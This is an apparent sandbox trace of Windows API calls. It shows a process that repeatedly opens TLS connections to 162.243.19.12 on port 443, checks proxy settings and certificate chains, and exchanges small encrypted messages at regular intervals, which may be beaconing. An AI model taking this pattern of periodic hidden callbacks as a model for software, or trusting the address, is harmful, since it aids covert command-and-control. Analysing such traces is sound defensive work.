	[0190.512] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48c0ed0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48c4b50, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48c4b50, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0190.514] FreeContextBuffer (in: pvContextBuffer=0x233fc686a40 | out: pvContextBuffer=0x233fc686a40) returned 0x0
	[0190.514] send (in: s=0x7cc, buf=0x233e48c4c20*, len=333, flags=0 | out: buf=0x233e48c4c20*) returned 333
	[0190.515] recv (in: s=0x7cc, buf=0x233e48c4c20, len=5, flags=0 | out: buf=0x233e48c4c20*) returned 5
	[0190.620] recv (in: s=0x7cc, buf=0x233e48c4c25, len=49, flags=0 | out: buf=0x233e48c4c25*) returned 49
	[0190.621] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48c0ed0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48c4e60, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48c4e80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48c4e80, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0190.621] recv (in: s=0x7cc, buf=0x233e48c4f70, len=5, flags=0 | out: buf=0x233e48c4f70*) returned 5
	[0190.621] recv (in: s=0x7cc, buf=0x233e48c4f95, len=1, flags=0 | out: buf=0x233e48c4f95*) returned 1
	[0190.621] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48c0ed0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48c5068, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48c5088, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48c5088, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0190.622] recv (in: s=0x7cc, buf=0x233e48c5178, len=5, flags=0 | out: buf=0x233e48c5178*) returned 5
	[0190.622] recv (in: s=0x7cc, buf=0x233e48c519d, len=48, flags=0 | out: buf=0x233e48c519d*) returned 48
	[0190.622] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48c0ed0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48c52a0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48c52c0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48c52c0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0190.623] FreeContextBuffer (in: pvContextBuffer=0x233e399c580 | out: pvContextBuffer=0x233e399c580) returned 0x0
	[0190.623] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48c5408 | out: pBuffer=0x233e48c5408) returned 0x0
	[0190.624] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48c5460 | out: pBuffer=0x233e48c5460) returned 0x0
	[0190.624] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48c54c8 | out: pBuffer=0x233e48c54c8) returned 0x0
	[0190.624] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0190.624] CertDuplicateStore (hCertStore=0x233fc6824b0) returned 0x233fc6824b0
	[0190.624] CertEnumCertificatesInStore (hCertStore=0x233fc6824b0, pPrevCertContext=0x0) returned 0x233fc67f430
	[0190.625] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0190.625] CertEnumCertificatesInStore (hCertStore=0x233fc6824b0, pPrevCertContext=0x233fc67f430) returned 0x0
	[0190.625] CertCloseStore (hCertStore=0x233fc6824b0, dwFlags=0x0) returned 1
	[0190.625] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0190.626] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682580
	[0190.626] CertAddCRLLinkToStore (in: hCertStore=0x233fc682580, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0190.626] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b4c8, hAdditionalStore=0x233fc682580, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0190.628] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0190.635] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0190.635] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0190.636] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0190.637] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0190.637] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0190.637] SetLastError (dwErrCode=0x0) 
	[0190.637] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0190.637] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0190.637] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0190.638] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48c80d0, MessageSeqNo=0x0 | out: pMessage=0x233e48c80d0) returned 0x0
	[0190.638] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fd50
	[0190.638] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fd50*=((len=0x3b, buf=0x233e48c5390*), (len=0xd5, buf=0x233e48c7ed8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fd50*=((len=0x3b, buf=0x233e48c5390*), (len=0xd5, buf=0x233e48c7ed8*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0190.638] CoTaskMemFree (pv=0x233fc64fd50) 
	[0190.639] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0190.639] recv (in: s=0x7cc, buf=0x233e48c8278, len=5, flags=0 | out: buf=0x233e48c8278*) returned 5
	[0191.163] recv (in: s=0x7cc, buf=0x233e48c829d, len=1488, flags=0 | out: buf=0x233e48c829d*) returned 1488
	[0191.164] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48c8980, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48c8980, pfQOP=0x0) returned 0x0
	[0191.165] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0191.165] SetEvent (hEvent=0x6b4) returned 1
	[0191.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0212.219] CloseHandle (hObject=0xa80) returned 1
	[0212.546] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0212.546] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa64) returned 0x0
	[0212.546] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0212.546] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0212.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0212.547] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0212.547] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0212.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x384) returned 0x0
	[0212.547] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0212.547] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0212.548] GetCurrentProcess () returned 0xffffffffffffffff
	[0212.548] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x9bc) returned 1
	[0212.548] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68aea0
	[0212.549] WinHttpSetTimeouts (hInternet=0x233fc68aea0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0212.549] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0212.573] SetEvent (hEvent=0x6b4) returned 1
	[0212.575] select (in: nfds=0, readfds=0x233e48d0098, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48d0098, writefds=0x0, exceptfds=0x0) returned 1
	[0212.575] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0212.577] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0212.577] shutdown (s=0x7cc, how=2) returned 0
	[0212.585] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0212.586] closesocket (s=0x7cc) returned 0
	[0212.587] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0212.587] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa4c
	[0212.588] WSAConnect (in: s=0x7cc, name=0x233e48d1830*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0212.696] closesocket (s=0xa4c) returned 0
	[0212.697] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48ce7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48d20b8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48d20b8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0212.698] FreeContextBuffer (in: pvContextBuffer=0x233fc687b80 | out: pvContextBuffer=0x233fc687b80) returned 0x0
	[0212.698] send (in: s=0x7cc, buf=0x233e48d2188*, len=333, flags=0 | out: buf=0x233e48d2188*) returned 333
	[0212.698] recv (in: s=0x7cc, buf=0x233e48d2188, len=5, flags=0 | out: buf=0x233e48d2188*) returned 5
	[0212.809] recv (in: s=0x7cc, buf=0x233e48d218d, len=49, flags=0 | out: buf=0x233e48d218d*) returned 49
	[0212.810] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48ce7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d23c8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48d23e8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48d23e8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0212.810] recv (in: s=0x7cc, buf=0x233e48d24d8, len=5, flags=0 | out: buf=0x233e48d24d8*) returned 5
	[0212.810] recv (in: s=0x7cc, buf=0x233e48d24fd, len=1, flags=0 | out: buf=0x233e48d24fd*) returned 1
	[0212.810] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48ce7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d25d0, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48d25f0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48d25f0, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0212.811] recv (in: s=0x7cc, buf=0x233e48d26e0, len=5, flags=0 | out: buf=0x233e48d26e0*) returned 5
	[0212.811] recv (in: s=0x7cc, buf=0x233e48d2705, len=48, flags=0 | out: buf=0x233e48d2705*) returned 48
	[0212.811] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48ce7d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48d2808, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48d2828, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48d2828, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0212.812] FreeContextBuffer (in: pvContextBuffer=0x233e399bb60 | out: pvContextBuffer=0x233e399bb60) returned 0x0
	[0212.812] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48d2970 | out: pBuffer=0x233e48d2970) returned 0x0
	[0212.812] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48d29c8 | out: pBuffer=0x233e48d29c8) returned 0x0
	[0212.813] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48d2a30 | out: pBuffer=0x233e48d2a30) returned 0x0
	[0212.813] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0212.813] CertDuplicateStore (hCertStore=0x233fc6830e0) returned 0x233fc6830e0
	[0212.813] CertEnumCertificatesInStore (hCertStore=0x233fc6830e0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0212.814] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0212.814] CertEnumCertificatesInStore (hCertStore=0x233fc6830e0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0212.814] CertCloseStore (hCertStore=0x233fc6830e0, dwFlags=0x0) returned 1
	[0212.815] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0212.816] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6824b0
	[0212.816] CertAddCRLLinkToStore (in: hCertStore=0x233fc6824b0, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0212.817] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6824b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0212.818] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0212.820] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0212.820] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0212.821] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0212.821] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0212.821] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0212.821] SetLastError (dwErrCode=0x0) 
	[0212.821] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0212.822] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0212.822] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0212.822] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48d5638, MessageSeqNo=0x0 | out: pMessage=0x233e48d5638) returned 0x0
	[0212.822] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fed0
	[0212.822] WSASend (in: s=0x7cc, lpBuffers=0x233fc64fed0*=((len=0x3b, buf=0x233e48d28f8*), (len=0xd5, buf=0x233e48d5440*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc64fed0*=((len=0x3b, buf=0x233e48d28f8*), (len=0xd5, buf=0x233e48d5440*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0212.823] CoTaskMemFree (pv=0x233fc64fed0) 
	[0212.823] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0212.823] recv (in: s=0x7cc, buf=0x233e48d57e0, len=5, flags=0 | out: buf=0x233e48d57e0*) returned 5
	[0213.284] recv (in: s=0x7cc, buf=0x233e48d5805, len=1488, flags=0 | out: buf=0x233e48d5805*) returned 1488
	[0213.284] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e48d5ee8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e48d5ee8, pfQOP=0x0) returned 0x0
	[0213.285] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0213.285] SetEvent (hEvent=0x6b4) returned 1
	[0213.317] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
	[0224.321] CloseHandle (hObject=0xa80) returned 1
	[0224.594] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0xa80) returned 0x0
	[0224.594] RegOpenKeyExW (in: hKey=0xa80, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xa64) returned 0x0
	[0224.594] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0224.594] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0224.595] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0224.595] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58
	[0224.595] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa58, fAsynchronous=1) returned 0x0
	[0224.596] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x384) returned 0x0
	[0224.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c8
	[0224.596] RegNotifyChangeKeyValue (hKey=0x384, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9c8, fAsynchronous=1) returned 0x0
	[0224.596] GetCurrentProcess () returned 0xffffffffffffffff
	[0224.597] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x9bc) returned 1
	[0224.597] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc689fc0
	[0224.597] WinHttpSetTimeouts (hInternet=0x233fc689fc0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0224.598] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0224.613] SetEvent (hEvent=0x6b4) returned 1
	[0224.614] select (in: nfds=0, readfds=0x233e48dd8e0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48dd8e0, writefds=0x0, exceptfds=0x0) returned 1
	[0224.614] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0224.616] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0224.617] shutdown (s=0x7cc, how=2) returned 0
	[0224.618] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0224.618] closesocket (s=0x7cc) returned 0
	[0224.619] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0224.619] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa4c
	[0224.619] WSAConnect (in: s=0x7cc, name=0x233e48df078*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0224.728] closesocket (s=0xa4c) returned 0
	[0224.729] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48dc020, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48df900, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48df900, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0224.730] FreeContextBuffer (in: pvContextBuffer=0x233fc686bb0 | out: pvContextBuffer=0x233fc686bb0) returned 0x0
	[0224.730] send (in: s=0x7cc, buf=0x233e48df9d0*, len=333, flags=0 | out: buf=0x233e48df9d0*) returned 333
	[0224.730] recv (in: s=0x7cc, buf=0x233e48df9d0, len=5, flags=0 | out: buf=0x233e48df9d0*) returned 5
	[0224.837] recv (in: s=0x7cc, buf=0x233e48df9d5, len=49, flags=0 | out: buf=0x233e48df9d5*) returned 49
	[0224.837] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48dc020, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48dfc10, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48dfc30, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48dfc30, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0224.837] recv (in: s=0x7cc, buf=0x233e48dfd20, len=5, flags=0 | out: buf=0x233e48dfd20*) returned 5
	[0224.838] recv (in: s=0x7cc, buf=0x233e48dfd45, len=1, flags=0 | out: buf=0x233e48dfd45*) returned 1
	[0224.838] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48dc020, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48dfe18, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48dfe38, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48dfe38, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0224.838] recv (in: s=0x7cc, buf=0x233e48dff28, len=5, flags=0 | out: buf=0x233e48dff28*) returned 5
	[0224.838] recv (in: s=0x7cc, buf=0x233e48dff4d, len=48, flags=0 | out: buf=0x233e48dff4d*) returned 48
	[0224.838] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48dc020, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48e0050, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48e0070, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48e0070, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0224.840] FreeContextBuffer (in: pvContextBuffer=0x233e399b740 | out: pvContextBuffer=0x233e399b740) returned 0x0
	[0224.840] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e48e01b8 | out: pBuffer=0x233e48e01b8) returned 0x0
	[0224.840] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48e0210 | out: pBuffer=0x233e48e0210) returned 0x0
	[0224.841] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e48e0278 | out: pBuffer=0x233e48e0278) returned 0x0
	[0224.841] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0224.841] CertDuplicateStore (hCertStore=0x233fc682da0) returned 0x233fc682da0
	[0224.842] CertEnumCertificatesInStore (hCertStore=0x233fc682da0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0224.842] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0224.842] CertEnumCertificatesInStore (hCertStore=0x233fc682da0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0224.842] CertCloseStore (hCertStore=0x233fc682da0, dwFlags=0x0) returned 1
	[0224.842] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0224.843] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683420
	[0224.843] CertAddCRLLinkToStore (in: hCertStore=0x233fc683420, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0224.844] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc683420, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0224.845] CertDuplicateCertificateChain (pChainContext=0x233e39caa40) returned 0x233e39caa40
	[0224.847] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0224.847] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0224.848] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0224.848] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0224.848] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233e39caa40, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0224.848] SetLastError (dwErrCode=0x0) 
	[0224.848] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233e39caa40, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0224.849] CertFreeCertificateChain (pChainContext=0x233e39caa40) 
	[0224.849] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0224.849] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e48e2e80, MessageSeqNo=0x0 | out: pMessage=0x233e48e2e80) returned 0x0
	[0224.849] CoTaskMemAlloc (cb=0x20) returned 0x233fc64fcf0
